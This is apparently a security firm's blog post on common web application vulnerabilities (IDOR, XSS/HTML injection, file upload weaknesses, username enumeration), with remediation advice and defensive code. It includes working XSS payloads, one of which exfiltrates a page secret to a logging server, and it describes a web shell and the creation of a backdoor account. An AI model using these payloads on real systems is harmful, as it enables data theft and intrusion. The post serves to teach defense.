Common Web App Vulnerabilities

Introduction

One of Triaxiom’s most popular assessments is the web application penetration test. These tests can range from simple single-page applications with very specific functionality to complex API-driven apps that serve data across a multitude of services and features. Despite how different applications are from one test to the next, Triaxiom sees the same types of vulnerabilities on a weekly basis. The goal of this blog is to outline some of the most common web app vulnerabilities and to provide information on remediating the issues within a vulnerable application.

Web Application Testing, A Primer

While this blog is not an exhaustive account of what a web application penetration test is and how it works, some background on the process can help provide context for the common web app vulnerabilities outlined below. At a very high level, Triaxiom will perform both manual and automated testing of a web application. Additionally, OSINT activities will be performed to uncover any hidden attack surface. Automated scanning is performed with multiple tools, including Burp Suite’s scanner, SQLMap, and directory busting tools (gobuster, for example). Manual testing consists of seeing what happens when user input is sent to the application and mapping the results. For more information on the aspects of web application penetration testing, please see Triaxiom’s collection of blogs on the topic.

A Note on OWASP Top 10:

Readers familiar with the OWASP Top 10 may note that the vulnerabilities here don’t always align with it. That is in part because some vulnerabilities, despite being extremely common, are not exactly riveting reading material. For example, most of the applications tested will support some sort of weak TLS 1.2 cipher suite. This can be caused by a proxy, a need for compatibility, or an old cipher that slipped by. No matter the cause, the vulnerability isn’t all that actionable, is relatively low on the criticality scale, and is typically an easy fix. Instead, this blog will focus on common web app vulnerabilities that have demonstrated real-world risk.

The Vulnerabilities

IDORs and Authorization Issues





Authorization issues, ranked number one by OWASP in terms of frequency, are also the most common web app vulnerability Triaxiom sees week after week. The issue boils down to a user having access to something they shouldn’t. This is often in the form of an Insecure Direct Object Reference, where some type of ID (numerical, UUID/GUID, token, etc.) dictates what information a user has access to, or in some cases how that information is modified.

Compounding the problem, authorization issues are often trivial to exploit. Often it is just a matter of changing an ID. For example, if the request is formatted as:

http://demo.triaxiomsecurity.local:64001/idor.html?id=101

Then to exploit it, the ‘id’ parameter needs to be altered:

http://demo.triaxiomsecurity.local:64001/idor.html?id=102

In a real-world example, Triaxiom found that user profile pictures were set with a request that called a six-digit numerical ID, for example 123456. Users could change this ID and add a different user’s profile picture to their account; however, a public profile picture is hardly sensitive data, and a better proof of concept (PoC) was needed. During testing, file uploads were marked with a similar six-digit numerical ID. Triaxiom found that it was possible to pull other users’ file uploads into the current user’s profile picture, leading to the disclosure of private and/or sensitive data.

In some IDORs the ID is not a simple number but a UUID (also known as a GUID in Microsoft environments), a 128-bit value usually written as a string of hexadecimal characters. For a penetration tester this presents a barrier. UUIDs/GUIDs are typically generated randomly, so they cannot be easily guessed and are not reasonable to brute force with repeated guesses. However, if the authorization protections are missing or deficient, attacks like the profile picture swap above still work the same way: simply replace one value with another.

How the values are obtained is another story. Triaxiom typically requires two accounts specifically to test for authorization issues. Other times UUIDs/GUIDs can be extracted from the application in other ways. Often an IDOR turns into a domino effect, where one IDOR leaks some type of information that can be used in the next IDOR, and so on. If an authorization schema is broken, it’s not uncommon to extract nearly all the data from an application via these attacks.

Other authorization issues often fall into the category of security by obscurity. For example, in a web application test, when an administrator logged in, they had a menu specifically for user administration. When a user logged in, that menu wasn’t visible, but all the functions were still accessible to the user if they knew the URL where the function resided. Triaxiom was able to find the URLs through a combination of authenticated directory busting (sending many requests to various endpoints hoping for a valid one) and reviewing the page source which showed links to the administrative functions. Admittedly, this type of vulnerability isn’t found with the same frequency as the example above, but often enough for an honorable mention here.

Remediation: IDORs and Authorization

To truly eliminate IDORs a multi-prong approach is needed.

Users need to be prevented from accessing and altering each other’s data or accessing data of higher level roles such as admins. This means enforcing some kind of server-side check to verify the user has the right to take the action they are trying.

User input should never be trusted outright. To fix this properly, all vulnerable locations need to be found. When Triaxiom performs a web application test, tools like Burp Suite in combination with the Autorize extension allow two users’ levels of access to be checked against each other. In a time-limited engagement with multiple priorities, it’s not always possible to find every single vulnerable endpoint. Once authorization is properly enforced, it may be wise to use UUIDs/GUIDs instead of easily guessed or brute-forced IDs. As noted above, complex IDs do not provide protection on their own, but they add a layer of security by making ID prediction impractical. Another important step is to dissociate old IDs from the data they are tied to. If they are still live in the system and an authorization issue persists, it’s possible for an attacker to uncover data using the old IDs.
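As a rough illustration of the server-side check described above, the following sketch looks up a requested object and returns it only if the session user owns it or holds an admin role. The `User` and `Upload` types, the in-memory `UPLOADS` store, and the `get_upload` function are hypothetical names invented for this example; a real application would tie this into its own session handling and database.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    user_id: int
    role: str  # "user" or "admin" (assumed role names)


@dataclass(frozen=True)
class Upload:
    upload_id: int
    owner_id: int
    filename: str


# Hypothetical in-memory store standing in for a database table.
UPLOADS = {
    101: Upload(upload_id=101, owner_id=1, filename="alice-taxes.pdf"),
    102: Upload(upload_id=102, owner_id=2, filename="bob-passport.png"),
}


class Forbidden(Exception):
    """Raised when the session user may not access the requested object."""


def get_upload(session_user: User, upload_id: int) -> Upload:
    """Return the upload only if the session user owns it or is an admin."""
    upload = UPLOADS.get(upload_id)
    # Respond identically for "missing" and "not yours" so the error
    # itself does not confirm which IDs exist.
    if upload is None or (
        upload.owner_id != session_user.user_id and session_user.role != "admin"
    ):
        raise Forbidden("not found or not permitted")
    return upload
```

The key point is that the identity comes from the server-side session, never from a parameter the client controls. With this check in place, changing `id=101` to `id=102` raises `Forbidden` for any user who does not own upload 102.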

HTML and XSS Injection



Injection has taken a tumble down the OWASP Top 10 in recent years; however, Triaxiom still finds it often enough that it merits a spot on this list. While not exactly the same, HTML injection and cross-site scripting (XSS) are usually two sides of the same coin. They occur when user input is incorporated directly into the server response and rendered in an unsafe way. The attacks can be stored, where the payload lives within the application and detonates whenever a user accesses that page, or reflected, where the payload is delivered via a request made by a victim user.

HTML vs XSS





HTML injection is often far less devastating than cross-site scripting. It occurs when HTML characters are passed into the application and, rather than printing as literal characters, render as HTML code. For example, Triaxiom will often start testing user input with simple examples like “<h1>HTML Injection</h1>”. If the application is vulnerable, this renders as a header, giving a clear indication there is an issue.

The next step would be to build a better PoC. For example, instead of a header, Triaxiom will inject an anchor tag and create a link to a malicious site. Now if the user clicks the link, thinking it’s legitimate, they are redirected to a web server controlled by Triaxiom, which might solicit them for credentials or just send a beacon indicating the user is active. Alternatively, if the app allows iframe tags, Triaxiom has been successful at using those tags either to insert a malicious web page that loads within the vulnerable application or to trigger a download of a malicious executable from a custom-built web server.



HTML injection can be devastating given the right circumstances, but it often relies on a user interacting with malicious content. This is where XSS comes into play, since it can be used to automate some of the attack chain. XSS occurs when user input can execute some type of script in the context of the victim user.

The most common example of this is the classic alert box, which pops up and displays a message, often “1” or “XSS”. While a pop up hardly sounds problematic, the attack can be both devastating and invisible to the victim.





Often, Triaxiom’s first step after discovering XSS is to check whether the session token (typically a session cookie) can be read by JavaScript. This is done with the “document.cookie” JavaScript property. In most cases, the payload is similar to the HTML injection above, because most of the time Triaxiom’s input lands inside HTML markup rather than directly inside a script. For example: <img src="x" onerror="alert(document.cookie)">. In this example, if the cookie is readable by scripts, it will be displayed in an alert pop-up:

If cookies don’t set the HttpOnly flag, they can be captured and exfiltrated to an attacker-controlled web server, which could allow the attacker to act as that user in the web application. Note in the image below the user doesn’t see any type of pop-up:



However, Triaxiom’s malicious web server captures the user’s token:




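The flag that blocks this kind of cookie theft is the HttpOnly cookie attribute, which hides the cookie from `document.cookie`. As a minimal sketch, assuming a Python back end that builds its own `Set-Cookie` header with the standard library, a session cookie could be issued as follows. The `build_session_cookie` function and the cookie name `session` are assumptions made for this example.

```python
from http.cookies import SimpleCookie


def build_session_cookie(token: str) -> str:
    """Return a Set-Cookie header value with hardening attributes set."""
    cookie = SimpleCookie()
    cookie["session"] = token
    cookie["session"]["httponly"] = True   # hidden from document.cookie
    cookie["session"]["secure"] = True     # only sent over HTTPS
    cookie["session"]["samesite"] = "Lax"  # limits cross-site sending
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()
```

Most web frameworks expose the same attributes through their own cookie or session settings, so in practice this is usually a configuration change rather than hand-built headers.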

If a user token cannot be stolen because it’s marked as HttpOnly, another option is to try to steal sensitive data that the user has access to. An attacker may be able to exfiltrate this data in a similar fashion to the way the cookies above are exfiltrated. In the image below, the user’s profile page contains a secret code. The page is vulnerable to XSS via a “msg” parameter. Using a crafted payload, the user’s secret code can be extracted and sent to a Triaxiom-controlled server:

The payload looks for the element on the page that contains the user’s secret code, stores its text in a variable, and sends it in a request to the Triaxiom server:

msg=<img src=x onerror="let e=document.getElementById('secretcode').innerText; new Image().src='http://127.0.0.1:64001/log?secretcode=' + (e);">

Remediation: HTML and XSS Injection

Again, remediation should be approached on multiple fronts.

User input needs to be filtered. Filtering is used to remove dangerous characters or strings; for example, if the user inputs <script>alert(1)</script>, the filter removes the script tags.

Encoding should be enforced so that any remaining input renders as text rather than as valid HTML or script code. This can be accomplished in a number of ways, but most often HTML entity encoding is used, which allows special characters to display while being interpreted only as text. Lastly, a web application firewall should be used in conjunction with the above fixes so that there are multiple layers an attacker would have to overcome when trying to find a valid HTML or XSS injection vulnerability.
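To make the encoding step concrete, here is a minimal sketch using `html.escape` from Python’s standard library. The `render_comment` function and the surrounding `<p>` markup are assumptions made for this example; most template engines apply equivalent escaping automatically when it is left enabled.

```python
import html


def render_comment(user_input: str) -> str:
    """Embed untrusted text in an HTML fragment as inert text."""
    # quote=True also encodes " and ' so the value stays inert inside
    # quoted attribute values as well as element bodies.
    safe = html.escape(user_input, quote=True)
    return f'<p class="comment">{safe}</p>'


print(render_comment("<h1>HTML Injection</h1>"))
# <p class="comment">&lt;h1&gt;HTML Injection&lt;/h1&gt;</p>
```

The browser now displays the literal text `<h1>HTML Injection</h1>` instead of rendering a header. Entity encoding like this fits HTML body and quoted attribute contexts; input placed inside a script block or a URL needs encoding appropriate to that context.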

File Upload Weaknesses

There are many reasons an application allows file uploads such as reading data from CSV templates, adding images, or uploading documents for review. File upload weaknesses collectively represent the issues Triaxiom sees every week when an application integrates some type of function that allows a user to upload a file to the web application. These vulnerabilities don’t often lead to critical results, but they occur so frequently that they’ve earned their spot on this list.

First and foremost, very few file uploads are scanned with any sort of antivirus. Triaxiom will make an initial test using the EICAR antivirus test file. This file contains a well-known signature that any antivirus should detect and prevent from being uploaded. Often these files land within the application without issue.

Because the EICAR test file is harmless and Triaxiom needs to demonstrate impact, the next step is to figure out where the file goes once uploaded. Most modern applications utilize some sort of cloud storage, such as an Amazon S3 bucket. Storing user-uploaded files in the cloud is a great way to eliminate a lot of vulnerabilities, since many files don’t execute by default from these locations. This means that uploads like web shells won’t be usable even if they are allowed to be uploaded. The catch here is that not all files remain harmless in cloud storage. HTML documents, if allowed, render in the client browser and can enable client-side attacks like XSS.

Once the file location is known, attackers will begin to test whether the protections in place can be bypassed. For example, if the application only checks that the extension of a file is allowed, a malicious file may be uploaded with an accepted extension, but when visited with a browser, it is read as its real file type and executes as the attacker intended. Worse yet, some file uploads are only “prevented” via client-side code. This means that the user can step over these protections by altering the request in transit, since there is no server-side mechanism to prevent the upload.

The examples above are the most common file bypasses that Triaxiom sees on a regular basis. Older attacks like adding a null byte so that the application drops the intended file extension are much less common, though viable in some circumstances.

Once a file upload is successful, the location of the file is known, and protections are bypassed, the results are analyzed to see where the attack can go. Client-side attacks rely on a user clicking a malicious file held within the app. This can range from the XSS example above to drive-by-download attacks where the user inadvertently ends up with malware on their system.



The more devastating side of a vulnerable file upload would be a user gaining some kind of remote code execution (RCE) on the underlying web server. In the example below, Triaxiom has successfully uploaded a web shell to a demo site. The web server is running in the context of the default Kali Linux user, kali, which is found by using the web shell’s cmd parameter and a whoami command. This account has limited permissions but can be used to enumerate the system and attempt to escalate access or locate sensitive data.



If the server is running as an administrator of some sort, the attack has much more potential. In the example, the web server runs as root, which means system changes can be made:



Using the useradd command, a new user is added:



Now when reviewing active users, the rce_example account can be seen in the list, creating a backdoor account:

Remediation: File Upload Weaknesses

Remediation should take into account the following:

- Create a whitelist of approved file types. These file types should be checked server side for both the correct extension and the file signature (sometimes called magic numbers or magic bytes) to ensure the files are genuine.

- Restrict file size to prevent a user from uploading a large file that could drive up cloud storage costs or cause a denial of service (DoS) on the local server.

- Where possible, store files in cloud-based storage, which is generally safer.

- Ensure an antivirus of some type is in use to add an additional layer of security.
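The first two checks in the list can be sketched in a few lines. This is an illustrative example only: the `validate_upload` function, the 5 MiB limit, and the specific set of allowed types are assumptions, and the signature table covers just a handful of formats.

```python
import os

MAX_UPLOAD_BYTES = 5 * 1024 * 1024  # assumed 5 MiB limit for this sketch

# Allowed extensions mapped to the leading bytes a genuine file should have.
ALLOWED_SIGNATURES = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".pdf": [b"%PDF-"],
}


def validate_upload(filename: str, content: bytes) -> bool:
    """Return True only if size, extension, and magic bytes all check out."""
    if len(content) == 0 or len(content) > MAX_UPLOAD_BYTES:
        return False
    # A null byte in the name is a classic extension-truncation trick.
    if "\x00" in filename:
        return False
    extension = os.path.splitext(filename)[1].lower()
    signatures = ALLOWED_SIGNATURES.get(extension)
    if signatures is None:
        return False
    return any(content.startswith(sig) for sig in signatures)
```

A check like this must run on the server, since anything enforced only in the browser can be bypassed by altering the request in transit. Magic bytes can also be forged, so this complements rather than replaces antivirus scanning and safe storage.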

Username Enumeration

Username enumeration is often a product of convenience over security. When a user attempts to log into an account and enters the wrong username or wrong password, often the application will let them know which field is incorrect. Knowing which field is wrong is genuinely helpful to customers/clients using an application, as they know where to make the correction. For an attacker this is an important bit of information, and without other precautions in place it can make for an easy way to find valid users, which can be used for password spraying attacks on the target application or elsewhere in the victim’s environment.



User enumeration can be verbose, like in the example above, or it can be based on subtler factors such as response size, generic error codes that only occur when an invalid user is submitted, or the time it takes the server to respond when a valid user is entered versus an invalid one.

In the example below the login page gives a clear indication if the user is valid or not, and what the problem with their login was:







Sometimes the error is not quite as telling, but a pattern still exists that allows for the discovery of usernames. In the first example, the non-existent user generates a very different error message than a valid user:

When a valid user is submitted, the error is very different:

As seen above, there are multiple ways username enumeration can occur. Not pictured, but similar: usernames can also be enumerated from forgot password portals, again by reading either verbose errors or generic errors that vary based on the validity of the username. In either case, the goal is the same: obtain usernames and test them with passwords until access is gained. Depending on the organization, these usernames can be used across multiple applications, meaning that username enumeration on one app ends up revealing usernames that can be used everywhere. One topic not often discussed with username enumeration is how this data can be used for Open Source Intelligence (OSINT) engagements. Knowing which websites and applications are in use by a person can make it much easier to conduct a targeted spear phishing campaign against them.

Remediation: Username Enumeration

Fixing username enumeration is about controlling the error messages and server response times. The error messages should always be generic. For example, regardless of whether the username is valid, a login portal should always state something along the lines of “Bad username or password, please try again”, whereas a forgot username/password endpoint should simply state “If a valid account has been entered, an email will be sent within five minutes with instructions on how to log into the account”. For timing issues, artificial delays can be added so that a non-existent username takes roughly the same time to process as a valid one.
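One way to approach both the generic message and the timing concern is sketched below. Rather than a sleep-based timer, this example swaps in a related technique: it hashes the submitted password against a dummy record when the username is unknown, so both paths do roughly the same work. The `USERS` store, the `login` function, the PBKDF2 iteration count, and the sample credentials are all assumptions made for illustration.

```python
import hashlib
import hmac
import os
from typing import Tuple

GENERIC_ERROR = "Bad username or password, please try again"
ITERATIONS = 100_000  # assumed work factor for this sketch


def hash_password(password: str, salt: bytes) -> bytes:
    """Derive a password hash with PBKDF2-HMAC-SHA256."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Hypothetical user store: username -> (salt, password hash).
_salt = os.urandom(16)
USERS = {"alice": (_salt, hash_password("correct horse", _salt))}

# Dummy credentials so unknown usernames cost the same hashing work.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password("not-a-real-password", _DUMMY_SALT)


def login(username: str, password: str) -> Tuple[bool, str]:
    """Return (success, message) without revealing which field was wrong."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    candidate = hash_password(password, salt)
    # compare_digest avoids leaking where the two values first differ.
    matches = hmac.compare_digest(candidate, stored)
    if matches and username in USERS:
        return True, "Welcome back"
    return False, GENERIC_ERROR
```

A wrong password for a valid user and any password for an unknown user both return the same message after the same hashing cost. Response times will still vary slightly with server load, which is one reason rate limiting remains a useful additional layer.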

Additional protections should include rate limiting so that an attacker cannot simply send thousands of attempts to look for issues that might reveal the validity of a username. Instead, the rate limit would trigger and prevent further attempts for a set period of time.
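A rate limit of this kind can be sketched as a sliding window of recent attempts per client. The `LoginRateLimiter` class, its thresholds, and the use of an IP address as the client key are assumptions for this example. A production deployment would more likely keep this state in a shared store or enforce the limit at a gateway or WAF.

```python
import time
from collections import defaultdict, deque
from typing import Optional

MAX_ATTEMPTS = 5       # assumed threshold
WINDOW_SECONDS = 60.0  # assumed window length


class LoginRateLimiter:
    """Sliding-window limiter keyed by a client identifier such as an IP."""

    def __init__(self, max_attempts: int = MAX_ATTEMPTS,
                 window: float = WINDOW_SECONDS) -> None:
        self.max_attempts = max_attempts
        self.window = window
        self._attempts = defaultdict(deque)

    def allow(self, client_id: str, now: Optional[float] = None) -> bool:
        """Return True and record the attempt if the client is under the limit."""
        now = time.monotonic() if now is None else now
        attempts = self._attempts[client_id]
        # Drop attempts that have aged out of the window.
        while attempts and now - attempts[0] >= self.window:
            attempts.popleft()
        if len(attempts) >= self.max_attempts:
            return False
        attempts.append(now)
        return True
```

The login handler would call `allow()` before checking credentials and return a generic "too many attempts" response when it returns `False`. The `now` parameter exists only so the behavior can be exercised without waiting on a real clock.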

Conclusion

The above is a list of common web app vulnerabilities Triaxiom sees every week during web application penetration testing engagements. The severity of these vulnerabilities ranges from relatively benign up to critical attacks that can cripple an application. An important takeaway for the issues above (and most remediation efforts in general) is the need for layers of defense. Below is a list of common questions Triaxiom gets during report reviews regarding the vulnerabilities discussed:

Ensuring user input is never trusted by encoding and filtering that input so that it cannot execute in the web application. Once input is no longer trusted adding a web application firewall creates an additional layer of protection.

Authorization is tricky to get just right. Access to data is not one size fits all, users of different levels can have drastically different needs, and it’s often easier to sequester roles client side than to create the checks and balances needed server side.

Absolutely, and this is why it’s such a common web app vulnerability. Detailed error messages that disclose the validity of a username are often helpful to legitimate users; however, the risk can outweigh the convenience of the disclosure. Additionally, users have several tools at their disposal to track usernames, such as password managers and near-instant access to email accounts that can recover account data.